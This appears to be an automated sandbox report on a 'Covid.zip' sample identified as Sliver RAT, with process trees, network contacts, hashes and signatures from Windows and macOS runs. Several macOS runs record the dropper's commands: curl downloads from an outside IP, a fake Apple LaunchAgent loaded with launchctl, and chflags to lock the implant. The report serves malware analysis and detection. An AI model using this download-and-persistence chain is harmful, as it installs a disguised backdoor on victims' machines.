Analysis Overview
SHA256
809631d5c1dfd10a9e185e7ca312eeddcdb46b3ba4afa60ab8cb61accbf3a5fa
Threat Level: Known bad
The file Covid.zip was found to be: Known bad.
Malicious Activity Summary
Sliver RAT v2
Sliver family
Exfiltration Over Alternative Protocol
Launch Agent
Resource Forking
Enumerates physical storage devices
Launchctl
Suspicious use of SetWindowsHookEx
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-07 18:36
Signatures
Sliver RAT v2
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sliver family
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
win11-20241007-en
Max time kernel
93s
Max time network
95s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\covid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
macos-20241101-en
Max time kernel
69s
Max time network
104s
Command Line
Signatures
Processes
/bin/sh
[sh -c sudo /bin/zsh -c "/Users/run/Covid/covid"]
/bin/bash
[sh -c sudo /bin/zsh -c "/Users/run/Covid/covid"]
/usr/bin/sudo
[sudo /bin/zsh -c /Users/run/Covid/covid]
/bin/zsh
[/bin/zsh -c /Users/run/Covid/covid]
/Users/run/Covid/covid
[/Users/run/Covid/covid]
/usr/libexec/xpcproxy
[xpcproxy com.apple.WebKit.WebContent.1812A28A-CD94-4C3D-8BD5-FBB8D909FA3F 480]
/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent
[/System/Library/Frameworks/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent]
/usr/libexec/xpcproxy
[xpcproxy com.apple.ViewBridgeAuxiliary]
/System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/XPCServices/ViewBridgeAuxiliary.xpc/Contents/MacOS/ViewBridgeAuxiliary
[/System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/XPCServices/ViewBridgeAuxiliary.xpc/Contents/MacOS/ViewBridgeAuxiliary]
/usr/libexec/xpcproxy
[xpcproxy com.apple.Safari.SafeBrowsing.Service]
/System/Library/PrivateFrameworks/SafariSafeBrowsing.framework/com.apple.Safari.SafeBrowsing.Service
[/System/Library/PrivateFrameworks/SafariSafeBrowsing.framework/com.apple.Safari.SafeBrowsing.Service]
/usr/libexec/xpcproxy
[xpcproxy com.apple.secinitd]
/usr/libexec/secinitd
[/usr/libexec/secinitd]
/usr/libexec/xpcproxy
[xpcproxy com.apple.audio.systemsoundserverd]
/usr/sbin/systemsoundserverd
[/usr/sbin/systemsoundserverd]
/usr/libexec/xpcproxy
[xpcproxy com.apple.pbs]
/System/Library/CoreServices/pbs
[/System/Library/CoreServices/pbs]
/usr/libexec/xpcproxy
[xpcproxy com.apple.audio.AudioComponentRegistrar]
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
[/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon]
/usr/libexec/xpcproxy
[xpcproxy com.apple.nsurlstoraged]
/usr/libexec/nsurlstoraged
[/usr/libexec/nsurlstoraged --privileged]
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 16-courier.push.apple.com | udp |
| SG | 46.137.201.254:8001 | tcp | |
| US | 8.8.8.8:53 | safebrowsing.googleapis.com | udp |
| GB | 172.217.169.42:443 | safebrowsing.googleapis.com | tcp |
| US | 8.8.8.8:53 | lb._dns-sd._udp.0.0.127.10.in-addr.arpa | udp |
Files
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsObject.db
| MD5 | d3a1859e6ec593505cc882e6def48fc8 |
| SHA1 | f8e6728e3e9de477a75706faa95cead9ce13cb32 |
| SHA256 | 3ebafa97782204a4a1d75cfec22e15fcdeab45b65bab3b3e65508707e034a16c |
| SHA512 | ea2a749b105759ea33408186b417359deffb4a3a5ed0533cb26b459c16bb3524d67ede5c9cf0d5098921c0c0a9313fb9c2672f1e5ba48810eda548fa3209e818 |
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C//mds/mdsDirectory.db
| MD5 | 0e4a0d1ceb2af6f0f8d0167ce77be2d3 |
| SHA1 | 414ba4c1dc5fc8bf53d550e296fd6f5ad669918c |
| SHA256 | cca093bcfc65e25dd77c849866e110df72526dffbe29d76e11e29c7d888a4030 |
| SHA512 | 1dc5282d27c49a4b6f921ba5dfc88b8c1d32289df00dd866f9ac6669a5a8d99afeda614bffc7cf61a44375ae73e09cd52606b443b63636977c9cd2ef4fa68a20 |
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.Safari.SafeBrowsing/Google/malware,osx,url_expression
| MD5 | cb2bf504bb348394c22535f53d84dd54 |
| SHA1 | 73ff1adbf189c97ed6eab0ee36d977e621949250 |
| SHA256 | 8477ac495618b09c50b6abc999c82e5091d8492a4aa93ae7ef38d1b1a0555400 |
| SHA512 | 36d68bdc794ceec2be7740c90add4c3f97bab0b422f9949e006214ffff2a9ab4b6eca2b973f9083627ce0c21da9c5d5c58eb9f0b985b03dcfef406d5b7a9515b |
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.Safari.SafeBrowsing/Google/social_engineering,osx,url_expression
| MD5 | 2f050ca4ed7d18af575a9cc6df2ade1c |
| SHA1 | d9ad8939146ee1131bd80c45d769a527874d328a |
| SHA256 | 2e3b088f86354c4e39fd6d2bb5975a6c6ebfe80aea8789562f24a6a21165b46a |
| SHA512 | 2d13ddb65439f6243ef7ac214960941c845bd9a4ef5882bd727af6814951f854faf3d00dcc4c1d42063dc012ca03b058dfea3a02c1e69911a6150de76af88f30 |
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.Safari.SafeBrowsing/Google/unwanted_software,osx,url_expression
| MD5 | 5715fc0b6092d43b2aa14608956c9746 |
| SHA1 | 7e7abf3ca08e836e18336f14292460ce6ccebe16 |
| SHA256 | cc974e5143c41e37fce62413a4cee2ef12b3484ef7e926bba7630059f42cb2d2 |
| SHA512 | b9238e3934207a2e24b1b21ac7f9459fe101c67c35564318bd4264b43145458b16eafa568a5f6e2a5d1be095d20fe470324a494f587e423bcf475903a9822aef |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
win11-20241007-en
Max time kernel
147s
Max time network
151s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\softwareupdated
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
macos-20241106-en
Max time kernel
65s
Max time network
148s
Command Line
Signatures
Processes
/bin/sh
[sh -c sudo /bin/zsh -c "/Users/run/Covid/softwareupdated"]
/bin/bash
[sh -c sudo /bin/zsh -c "/Users/run/Covid/softwareupdated"]
/usr/bin/sudo
[sudo /bin/zsh -c /Users/run/Covid/softwareupdated]
/bin/zsh
[/bin/zsh -c /Users/run/Covid/softwareupdated]
/Users/run/Covid/softwareupdated
[/Users/run/Covid/softwareupdated]
/usr/libexec/xpcproxy
[xpcproxy com.apple.nsurlstoraged]
/usr/libexec/nsurlstoraged
[/usr/libexec/nsurlstoraged --privileged]
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21-courier.push.apple.com | udp |
| SG | 46.137.201.254:8888 | tcp | |
| US | 8.8.8.8:53 | lb._dns-sd._udp.0.0.127.10.in-addr.arpa | udp |
| SG | 46.137.201.254:8888 | tcp |
Files
/var/db/nsurlstoraged/dafsaData.bin
| MD5 | 64f469698e53d0c828b7f90acd306082 |
| SHA1 | bcc041b3849e1b0b4104ffeb46002207eeac54f3 |
| SHA256 | d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd |
| SHA512 | a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f |
Analysis: behavioral5
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
win11-20241007-en
Max time kernel
147s
Max time network
154s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-4249425805-3408538557-1766626484-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Covid\vpn.dmg
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:39
Platform
macos-20241101-en
Max time kernel
80s
Max time network
99s
Command Line
Signatures
Exfiltration Over Alternative Protocol
| Description | Indicator | Process | Target |
| N/A | curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated | N/A | N/A |
| N/A | curl -L http://46.137.201.254/covid -o /Users/run/covid | N/A | N/A |
Launch Agent
Resource Forking
| Description | Indicator | Process | Target |
| N/A | /bin/bash /Volumes/vpn/vpn.app/Contents/Resources/script | N/A | N/A |
Launchctl
| Description | Indicator | Process | Target |
| N/A | launchctl start softwareupdated | N/A | N/A |
| N/A | launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist | N/A | N/A |
Processes
/bin/sh
[sh -c sudo /bin/zsh -c "open /Volumes/vpn/vpn.app"]
/bin/bash
[sh -c sudo /bin/zsh -c "open /Volumes/vpn/vpn.app"]
/usr/bin/sudo
[sudo /bin/zsh -c open /Volumes/vpn/vpn.app]
/bin/zsh
[/bin/zsh -c open /Volumes/vpn/vpn.app]
/usr/bin/open
[open /Volumes/vpn/vpn.app]
/usr/libexec/xpcproxy
[xpcproxy com.apple.softwareupdate.2324]
/Volumes/vpn/vpn.app/Contents/MacOS/vpn
[/Volumes/vpn/vpn.app/Contents/MacOS/vpn]
/bin/bash
[/bin/bash /Volumes/vpn/vpn.app/Contents/Resources/script]
/usr/bin/uname
[uname -m]
/bin/mkdir
[mkdir /Users/run/.androids]
/usr/bin/curl
[curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated]
/bin/chmod
[chmod a+x /Users/run/.androids/softwareupdated]
/bin/chmod
[chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]
/bin/launchctl
[launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]
/usr/libexec/xpcproxy
[xpcproxy softwareupdated]
/bin/launchctl
[launchctl start softwareupdated]
/Users/run/.androids/softwareupdated
[/Users/run/.androids/softwareupdated]
/usr/bin/chflags
[chflags uchg /Users/run/.androids/softwareupdated]
/usr/bin/curl
[curl -L http://46.137.201.254/covid -o /Users/run/covid]
/Users/run/.androids/softwareupdated
[/Users/run/.androids/softwareupdated -D]
Network
| Country | Destination | Domain | Proto |
| SG | 46.137.201.254:80 | tcp | |
| US | 8.8.8.8:53 | e6858.dscx.akamaiedge.net | udp |
| SG | 46.137.201.254:80 | tcp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
win11-20241007-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\vpn.app\Contents\MacOS\vpn
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
macos-20241106-en
Max time kernel
77s
Max time network
147s
Command Line
Signatures
Exfiltration Over Alternative Protocol
| Description | Indicator | Process | Target |
| N/A | curl -L http://46.137.201.254/covid -o /Users/run/covid | N/A | N/A |
| N/A | curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated | N/A | N/A |
Launch Agent
Resource Forking
| Description | Indicator | Process | Target |
| N/A | /bin/bash /Users/run/vpn.app/Contents/Resources/script | N/A | N/A |
Launchctl
| Description | Indicator | Process | Target |
| N/A | launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist | N/A | N/A |
| N/A | launchctl start softwareupdated | N/A | N/A |
Processes
/bin/sh
[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/MacOS/vpn"]
/bin/bash
[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/MacOS/vpn"]
/usr/bin/sudo
[sudo /bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn]
/bin/zsh
[/bin/zsh -c /Users/run/vpn.app/Contents/MacOS/vpn]
/Users/run/vpn.app/Contents/MacOS/vpn
[/Users/run/vpn.app/Contents/MacOS/vpn]
/bin/bash
[/bin/bash /Users/run/vpn.app/Contents/Resources/script]
/usr/bin/uname
[uname -m]
/bin/mkdir
[mkdir /Users/run/.androids]
/usr/bin/curl
[curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated]
/usr/libexec/xpcproxy
[xpcproxy com.apple.nsurlstoraged]
/usr/libexec/nsurlstoraged
[/usr/libexec/nsurlstoraged --privileged]
/bin/chmod
[chmod a+x /Users/run/.androids/softwareupdated]
/bin/chmod
[chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]
/bin/launchctl
[launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]
/usr/libexec/xpcproxy
[xpcproxy softwareupdated]
/Users/run/.androids/softwareupdated
[/Users/run/.androids/softwareupdated -D]
/bin/launchctl
[launchctl start softwareupdated]
/Users/run/.androids/softwareupdated
[/Users/run/.androids/softwareupdated]
/usr/bin/chflags
[chflags uchg /Users/run/.androids/softwareupdated]
/usr/bin/curl
[curl -L http://46.137.201.254/covid -o /Users/run/covid]
Network
| Country | Destination | Domain | Proto |
| SG | 46.137.201.254:80 | tcp | |
| US | 8.8.8.8:53 | e6858.dscx.akamaiedge.net | udp |
| SG | 46.137.201.254:80 | tcp | |
| US | 8.8.8.8:53 | lb._dns-sd._udp.0.0.127.10.in-addr.arpa | udp |
Files
/var/db/nsurlstoraged/dafsaData.bin
| MD5 | 64f469698e53d0c828b7f90acd306082 |
| SHA1 | bcc041b3849e1b0b4104ffeb46002207eeac54f3 |
| SHA256 | d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd |
| SHA512 | a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f |
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
win11-20241007-en
Max time kernel
91s
Max time network
95s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\vpn.app\Contents\Resources\script
Network
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-11-07 18:36
Reported
2024-11-07 18:40
Platform
macos-20241106-en
Max time kernel
114s
Max time network
145s
Command Line
Signatures
Exfiltration Over Alternative Protocol
| Description | Indicator | Process | Target |
| N/A | curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated | N/A | N/A |
| N/A | curl -L http://46.137.201.254/covid -o /Users/run/covid | N/A | N/A |
Launch Agent
Resource Forking
| Description | Indicator | Process | Target |
| N/A | /Users/run/vpn.app/Contents/Resources/script | N/A | N/A |
| N/A | sh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/Resources/script\"" | N/A | N/A |
| N/A | sudo /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script | N/A | N/A |
| N/A | /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script | N/A | N/A |
Launchctl
| Description | Indicator | Process | Target |
| N/A | launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist | N/A | N/A |
| N/A | launchctl start softwareupdated | N/A | N/A |
Processes
/bin/sh
[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/Resources/script"]
/bin/bash
[sh -c sudo /bin/zsh -c "/Users/run/vpn.app/Contents/Resources/script"]
/usr/bin/sudo
[sudo /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script]
/bin/zsh
[/bin/zsh -c /Users/run/vpn.app/Contents/Resources/script]
/Users/run/vpn.app/Contents/Resources/script
[/Users/run/vpn.app/Contents/Resources/script]
/usr/bin/uname
[uname -m]
/bin/mkdir
[mkdir /Users/run/.androids]
/usr/bin/curl
[curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated]
/usr/libexec/xpcproxy
[xpcproxy com.apple.nsurlstoraged]
/usr/libexec/nsurlstoraged
[/usr/libexec/nsurlstoraged --privileged]
/bin/chmod
[chmod a+x /Users/run/.androids/softwareupdated]
/bin/chmod
[chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]
/bin/launchctl
[launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist]
/usr/libexec/xpcproxy
[xpcproxy softwareupdated]
/bin/launchctl
[launchctl start softwareupdated]
/Users/run/.androids/softwareupdated
[/Users/run/.androids/softwareupdated -D]
/Users/run/.androids/softwareupdated
[/Users/run/.androids/softwareupdated]
/usr/bin/chflags
[chflags uchg /Users/run/.androids/softwareupdated]
/usr/bin/curl
[curl -L http://46.137.201.254/covid -o /Users/run/covid]
/usr/libexec/xpcproxy
[xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E]
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
[/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService]
Network
| Country | Destination | Domain | Proto |
| SG | 46.137.201.254:80 | tcp | |
| US | 8.8.8.8:53 | b._dns-sd._udp.0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | db._dns-sd._udp.0.0.127.10.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | itunes.apple.com | udp |
| GB | 23.74.160.23:443 | itunes.apple.com | tcp |
| SG | 46.137.201.254:80 | tcp | |
| US | 8.8.8.8:53 | lb._dns-sd._udp.0.0.127.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cds.apple.com | udp |
| US | 23.192.22.130:443 | cds.apple.com | tcp |
| US | 8.8.8.8:53 | help.apple.com | udp |
| GB | 2.23.221.174:443 | help.apple.com | tcp |
| GB | 2.23.221.174:443 | help.apple.com | tcp |
Files
/var/db/nsurlstoraged/dafsaData.bin
| MD5 | 64f469698e53d0c828b7f90acd306082 |
| SHA1 | bcc041b3849e1b0b4104ffeb46002207eeac54f3 |
| SHA256 | d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd |
| SHA512 | a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f |